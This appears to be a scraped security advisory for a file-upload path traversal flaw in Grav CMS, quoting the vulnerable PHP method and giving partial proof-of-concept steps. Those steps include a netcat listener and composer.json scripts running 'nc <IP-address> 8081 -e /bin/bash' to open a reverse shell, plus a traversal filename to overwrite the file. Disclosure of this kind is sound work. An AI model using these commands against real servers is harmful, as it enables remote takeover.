8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.4 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
10.6%
Grav is vulnerable to a file upload path traversal vulnerability, that can allow an adversary to replace or create files with extensions such as .json, .zip, .css, .gif, etc. This vulnerabiltiy can allow attackers to inject arbitrary code on the server, undermine integrity of backup files by overwriting existing backups or creating new ones, and exfiltrating sensitive data using CSS Injection exfiltration techniques.
Vulnerable code location: grav/system/src/Grav/Common/Media/Traits/MediaUploadTrait.php/checkFileMetadata() method_
public function checkFileMetadata(array $metadata, string $filename = null, array $settings = null): string
{
// Add the defaults to the settings.
$settings = $this->getUploadSettings($settings);
// Destination is always needed (but it can be set in defaults).
$self = $settings['self'] ?? false;
if (!isset($settings['destination']) && $self === false) {
throw new RuntimeException($this->translate('PLUGIN_ADMIN.DESTINATION_NOT_SPECIFIED'), 400);
}
if (null === $filename) {
// If no filename is given, use the filename from the uploaded file (path is not allowed).
$folder = '';
$filename = $metadata['filename'] ?? '';
} else {
// If caller sets the filename, we will accept any custom path.
$folder = dirname($filename); `-> Vulnerable Code`
if ($folder === '.') {
$folder = '';
}
$filename = Utils::basename($filename);
nc -lvnp 8081
Note: “nc” or netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. We are using this tool to get a reverse shell from the server hosting Grav CMS.
7. Using a web interception proxy, click on the “Page Media” section and upload a json file with the following added to the “scripts” section (https://getcomposer.org/doc/articles/scripts.md):
"post-install-cmd": "nc <IP-address> 8081 -e /bin/bash",
"post-update-cmd": "nc <IP-address> 8081 -e /bin/bash"
Note: The post installation and update script used in this PoC is only for demonstration purposes. There are various other scripts that may be injected such as command
that executes the corresponding script before any Composer Command is executed on the CLI.
Note: . Please replace <IP-address> with the IP address of the Kali Linux netcat listener.
8. Modify the “name” parameter to “…/…/…/c/omposer.json” and forward the request.
9. Observe the successful upload message from the server response:
10. In the Grav web root, observe that the “composer.json” file was successfully replaced by the malicious “composer.json” file containing a reverse shell script.
11. Run any variations of the following commands in the Grav web server and observe the successful reverse shell:
Arbitrary Code Injection: Attackers can replace the composer.json file with a malicious one containing arbitratry composer scripts. This can result in code execution when the composer
command is used for any purpose in the server. that can allow attackers to get a reverse shell on the server.
Backup Compromise: .zip backup files can be replaced, undermining data integrity and recovery mechanisms:
Sensitive Information Exposure: Modification of .css files provides an avenue for attackers to exfiltrate sensitive information, such as usernames and passwords, compromising confidentiality.
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.4 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
10.6%